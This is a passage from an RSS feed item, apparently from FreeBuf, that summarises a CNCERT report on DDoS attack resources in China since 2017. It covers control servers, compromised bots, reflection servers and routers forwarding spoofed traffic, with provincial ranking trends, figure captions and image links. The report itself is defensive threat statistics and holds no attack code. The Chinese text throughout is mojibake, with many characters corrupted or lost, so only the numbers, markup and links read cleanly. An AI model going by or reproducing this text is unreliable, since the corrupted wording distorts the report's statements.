3672<p style="text-align: justify;">2017年以æ¥ï¼Œå…±ç›‘测å‘现我国境内535个曾ç»å‘起较大规模DDoS攻击的控制端资æºï¼Œä¸»è¦ä½äºŽæˆ‘国境内20个çœå¸‚,未å‘现ä½äºŽç”˜è‚ƒã€æ²³åŒ—ã€å‰æž—ã€å†…è’™å¤ã€å®å¤ã€é’æµ·ã€å±±ä¸œã€å±±è¥¿ã€è¥¿è—ã€æ–°ç–†ç‰çœå¸‚的控制端。</p>
3673</p>
3674<p style="text-align: justify;">å„çœå¸‚æŽ§åˆ¶ç«¯èµ„æºæ•°é‡çš„æœˆåº¦æŽ’åå˜åŒ–情况如图21所示。从图ä¸å¯ä»¥çœ‹å‡ºï¼Œé™•西ã€å¤©æ´¥ã€æ¹–北ã€é»‘龙江ã€å¹¿è¥¿ã€é‡åº†ã€æ¹–å—ç‰çœå¸‚çš„æŽ§åˆ¶ç«¯èµ„æºæŽ’åæ™®é排在åŽéƒ¨ï¼Œæˆ–æ˜¯è¿‘æœŸæ— å˜æ´»ï¼›ç¦å»ºã€å¹¿ä¸œã€æ±Ÿè‹ã€ä¸Šæµ·ç‰çœå¸‚çš„æŽ§åˆ¶ç«¯èµ„æºæŽ’åç›¸è¾ƒæœ‰ä¸€å®šçš„å¥½è½¬ï¼›åŒ—äº¬ã€æµ™æ±Ÿã€è´µå·žç‰çœå¸‚çš„æŽ§åˆ¶ç«¯èµ„æºæŽ’åæƒ…å†µç›¸è¾ƒæ— å¥½è½¬ã€æˆ–å˜åœ¨ä¸€å®šæ¶åŒ–。</p>
3675<p><img alt="è¿‘åŠå¹´å¢ƒå†…控制端所属çœä»½æŽ’åæƒ…况å˜åŒ–趋势" src="http://image.3001.net/images/20180724/15324142167781.png!small" width="690" height="334.97435897435895"></p>
3676<p style="text-align: center;">图21 è¿‘åŠå¹´å¢ƒå†…控制端所属çœä»½æŽ’åæƒ…况å˜åŒ–趋势</p>
3677</p>
3678<p style="text-align: justify;"><b>(2) 肉鸡资æº</b></p>
3679</p>
3680<p style="text-align: justify;">2017年以æ¥ï¼Œå…±ç›‘测å‘现我国境内1,700,146个曾ç»è¢«åˆ©ç”¨å‘起较大规模DDoS攻击的肉鸡资æºã€‚</p>
3681</p>
3682<p style="text-align: justify;">å„çœå¸‚è‚‰é¸¡èµ„æºæ•°é‡çš„æœˆåº¦æŽ’åå˜åŒ–情况如图22所示。从图ä¸å¯ä»¥çœ‹å‡ºï¼Œé’æµ·ã€å®å¤ã€è¥¿è—ã€ç”˜è‚ƒã€æµ·å—ã€å†…è’™å¤ã€å¹¿è¥¿ã€å¤©æ´¥ç‰çœå¸‚çš„è‚‰é¸¡èµ„æºæŽ’åæ™®é排在åŽéƒ¨ï¼Œæˆ–æ˜¯è¿‘æœŸæ— å˜æ´»ï¼›æ¹–å—ã€æ¹–åŒ—ã€æ±Ÿè¥¿ã€æ–°ç–†ã€é‡åº†ç‰çœå¸‚çš„è‚‰é¸¡èµ„æºæŽ’å相较有一定的好转;广东ã€ä¸Šæµ·ã€å±±ä¸œã€æ±Ÿè‹ã€æµ™æ±Ÿã€å±±è¥¿ç‰çœå¸‚çš„è¢«åˆ©ç”¨èµ„æºæ•°é‡æŽ’åè¿‘å‡ æœˆç›¸è¾ƒæœ‰ä¸€å®šçš„å¥½è½¬ï¼Œä½†ä»æ™®é排在å‰åˆ—;北京ã€å››å·ã€é»‘é¾™æ±Ÿã€æ²³åŒ—ã€è´µå·žã€æ²³å—ç‰çœå¸‚çš„è‚‰é¸¡èµ„æºæŽ’åæƒ…å†µç›¸è¾ƒæ— å¥½è½¬ã€æˆ–å˜åœ¨ä¸€å®šæ¶åŒ–。</p>
3683<p><img alt="è¿‘åŠå¹´å¢ƒå†…肉鸡所属çœä»½æŽ’åæƒ…况å˜åŒ–趋势" src="http://image.3001.net/images/20180724/15324142392217.png!small" width="690" height="329.7448979591837"> </p>
3684</p>
3685<p style="text-align: center;">
3686</p>
3687<p style="text-align: center;">图22 è¿‘åŠå¹´å¢ƒå†…肉鸡所属çœä»½æŽ’åæƒ…况å˜åŒ–趋势</p>
3688</p>
3689<p style="text-align: justify;"><b>(3) åå°„æœåŠ¡å™¨èµ„æº</b></p>
3690</p>
3691<p style="text-align: justify;">2017年以æ¥ï¼Œå…±ç›‘测å‘现我国境内11,199,098个曾ç»è¢«åˆ©ç”¨å‘èµ·DDoSå射攻击的åå°„æœåŠ¡å™¨èµ„æºã€‚</p>
3692</p>
3693<p style="text-align: justify;">å„çœå¸‚åå°„æœåŠ¡å™¨èµ„æºæ•°é‡çš„æœˆåº¦æŽ’åå˜åŒ–情况如图23所示。从图ä¸å¯ä»¥çœ‹å‡ºï¼Œè¥¿è—ã€æµ·å—ã€å¹¿è¥¿ã€é’æµ·ã€ç”˜è‚ƒã€äº‘å—ã€ä¸Šæµ·ç‰çœå¸‚çš„åå°„æœåŠ¡å™¨èµ„æºæŽ’åæ™®é排在åŽéƒ¨ï¼Œæˆ–æ˜¯è¿‘æœŸæ— å˜æ´»ï¼›å››å·ã€å¤©æ´¥ã€å®å¤ã€è´µå·žã€æ¹–北ã€ç¦å»ºã€åŒ—äº¬ã€æ–°ç–†ç‰çœå¸‚çš„åå°„æœåŠ¡å™¨èµ„æºæŽ’å相较有一定的好转;山西ã€é»‘龙江ã€å‰æž—ã€æ²³åŒ—ã€å±±ä¸œç‰çœå¸‚çš„è¢«åˆ©ç”¨èµ„æºæ•°é‡æŽ’åè¿‘å‡ æœˆç›¸è¾ƒæœ‰ä¸€å®šçš„å¥½è½¬ï¼Œä½†ä»æ™®é排在å‰åˆ—;辽å®ã€å¹¿ä¸œã€æ±Ÿè‹ã€å†…è’™å¤ã€æ²³å—ã€æµ™æ±Ÿã€é‡åº†ã€å®‰å¾½ã€æ¹–å—ç‰çœå¸‚çš„åå°„æœåŠ¡å™¨èµ„æºæŽ’åæƒ…å†µç›¸è¾ƒæ— å¥½è½¬ã€æˆ–å˜åœ¨ä¸€å®šæ¶åŒ–。</p>
3694<p><img alt=" è¿‘åŠå¹´å¢ƒå†…åå°„æœåŠ¡å™¨æ‰€å±žçœä»½æŽ’åæƒ…况å˜åŒ–趋势" src="http://image.3001.net/images/20180724/15324142535581.png!small" width="690" height="325.18581081081084"> </p>
3695</p>
3696<p style="text-align: center;">图23 è¿‘åŠå¹´å¢ƒå†…åå°„æœåŠ¡å™¨æ‰€å±žçœä»½æŽ’åæƒ…况å˜åŒ–趋势</p>
3697</p>
3698<p><b>(4) è·¨åŸŸä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨èµ„æº</b></p>
3699</p>
3700<p style="text-align: justify;">2017年以æ¥ï¼Œå…±ç›‘测å‘现我国境内580个曾ç»è¢«åˆ©ç”¨è½¬å‘è·¨åŸŸä¼ªé€ æ”»å‡»æµé‡çš„è¿è¥å•†è·¯ç”±å™¨ã€‚主è¦ä½äºŽ28个çœå¸‚,未å‘现ä½äºŽå®å¤ã€è¥¿è—ç‰çœå¸‚的转å‘è·¨åŸŸä¼ªé€ æ”»å‡»æµé‡çš„è¿è¥å•†è·¯ç”±å™¨ã€‚</p>
3701</p>
3702<p style="text-align: justify;">å„çœå¸‚è·¨åŸŸä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨èµ„æºæ•°é‡çš„æœˆåº¦æŽ’åå˜åŒ–情况如图24所示。从图ä¸å¯ä»¥çœ‹å‡ºï¼Œé’æµ·ã€é»‘龙江ã€é‡åº†ã€é™•西ã€å±±è¥¿ç‰çœå¸‚çš„è¢«åˆ©ç”¨èµ„æºæ•°é‡æŽ’åæ™®é排在åŽéƒ¨ï¼Œæˆ–æ˜¯è¿‘æœŸæ— å˜æ´»ï¼›æ±Ÿè¥¿ã€ç¦å»ºã€è¾½å®ã€æ²³å—ã€æ²³åŒ—ã€ç”˜è‚ƒç‰çœå¸‚çš„è¢«åˆ©ç”¨èµ„æºæ•°é‡æŽ’åç›¸è¾ƒæœ‰ä¸€å®šçš„å¥½è½¬ï¼›å¹¿ä¸œã€æµ™æ±Ÿã€ä¸Šæµ·ç‰çœå¸‚çš„è¢«åˆ©ç”¨èµ„æºæ•°é‡æŽ’åè¿‘å‡ æœˆç›¸è¾ƒæœ‰ä¸€å®šçš„å¥½è½¬ï¼Œä½†ä»æ™®é排在å‰åˆ—ï¼›åŒ—äº¬ã€æ±Ÿè‹ã€å±±ä¸œã€è´µå·žã€å®‰å¾½ã€å†…è’™å¤ã€æ¹–å—ã€æ–°ç–†ç‰çœå¸‚çš„è¢«åˆ©ç”¨èµ„æºæ•°é‡æŽ’åæƒ…å†µç›¸è¾ƒæ— å¥½è½¬ã€æˆ–å˜åœ¨ä¸€å®šæ¶åŒ–。</p>
3703</p>
3704<p><img alt="è¿‘åŠå¹´å¢ƒå†…è·¨åŸŸä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨å½’属çœä»½æŽ’åæƒ…况å˜åŒ–趋势" src="http://image.3001.net/images/20180724/15324142676442.png!small" width="690" height="327.77969018932873"> </p>
3705</p>
3706<p style="text-align: center;">图24 è¿‘åŠå¹´å¢ƒå†…è·¨åŸŸä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨å½’属çœä»½æŽ’åæƒ…况å˜åŒ–趋势</p>
3707</p>
3708<p><b>(5) æœ¬åœ°ä¼ªé€ æ¥æºè·¯ç”±å™¨èµ„æº</b></p>
3709</p>
3710<p style="text-align: justify;">2017年以æ¥ï¼Œå…±ç›‘测å‘现我国境内1,081个曾ç»è¢«åˆ©ç”¨è½¬å‘æœ¬åŒºåŸŸä¼ªé€ æ”»å‡»æµé‡çš„è¿è¥å•†è·¯ç”±å™¨ã€‚</p>
3711</p>
3712<p style="text-align: justify;">å„çœå¸‚æœ¬åœ°ä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨èµ„æºæ•°é‡çš„æœˆåº¦æŽ’åå˜åŒ–情况如图25所示。从图ä¸å¯ä»¥çœ‹å‡ºï¼Œé’æµ·ã€è¥¿è—ã€æµ·å—ã€å¤©æ´¥ã€å†…è’™å¤ã€é‡åº†ã€å¹¿è¥¿ã€ç”˜è‚ƒã€å‰æž—ã€é»‘龙江ç‰çœå¸‚çš„è¢«åˆ©ç”¨èµ„æºæ•°é‡æŽ’åæ™®é排在åŽéƒ¨ï¼Œæˆ–æ˜¯è¿‘æœŸæ— å˜æ´»ï¼›å®‰å¾½ã€ä¸Šæµ·ã€å››å·ã€æ¹–北ã€è¾½å®ã€äº‘å—ã€æ±Ÿè¥¿ã€æ–°ç–†ç‰çœå¸‚çš„è¢«åˆ©ç”¨èµ„æºæ•°é‡æŽ’åç›¸è¾ƒæœ‰ä¸€å®šçš„å¥½è½¬ï¼›è´µå·žã€æµ™æ±Ÿç‰çœå¸‚çš„è¢«åˆ©ç”¨èµ„æºæ•°é‡æŽ’åè¿‘å‡ æœˆç›¸è¾ƒæœ‰ä¸€å®šçš„å¥½è½¬ï¼Œä½†ä»æ™®é排在å‰åˆ—;江è‹ã€åŒ—京ã€å¹¿ä¸œã€é™•è¥¿ã€æ¹–å—ã€å±±è¥¿ã€å±±ä¸œã€æ²³åŒ—ã€æ²³å—ç‰çœå¸‚çš„è¢«åˆ©ç”¨èµ„æºæ•°é‡æŽ’åæƒ…å†µç›¸è¾ƒæ— å¥½è½¬ã€æˆ–å˜åœ¨ä¸€å®šæ¶åŒ–。</p>
3713<p><img alt="è¿‘åŠå¹´å¢ƒå†…æœ¬åœ°ä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨å½’属çœä»½æŽ’åæƒ…况å˜åŒ–趋势" src="http://image.3001.net/images/20180724/1532414280565.png!small" width="690" height="332.61538461538464"> </p>
3714</p>
3715<p style="text-align: center;">图25 è¿‘åŠå¹´å¢ƒå†…æœ¬åœ°ä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨å½’属çœä»½æŽ’åæƒ…况å˜åŒ–趋势</p>
3716</p>
3717<p style="text-align: justify;">阅读原文,请点击以下链接:<a href="http://www.cert.org.cn/publish/main/upload/File/DDoS201806.pdf">http://www.cert.org.cn/publish/main/upload/File/DDoS201806.pdf</a></p>
3718<p style="text-align: justify;"><b style="color: rgb(159, 163, 168);">*本文作者:任å行,转载请注明æ¥è‡ª FreeBuf.COM </b></p>
3719]]></content:encoded>
3720 <wfw:commentRss>http://www.freebuf.com/articles/paper/178568.html/feed</wfw:commentRss>
3721 <slash:comments>1</slash:comments>
3722 </item>
3723 </channel>
3724</rss>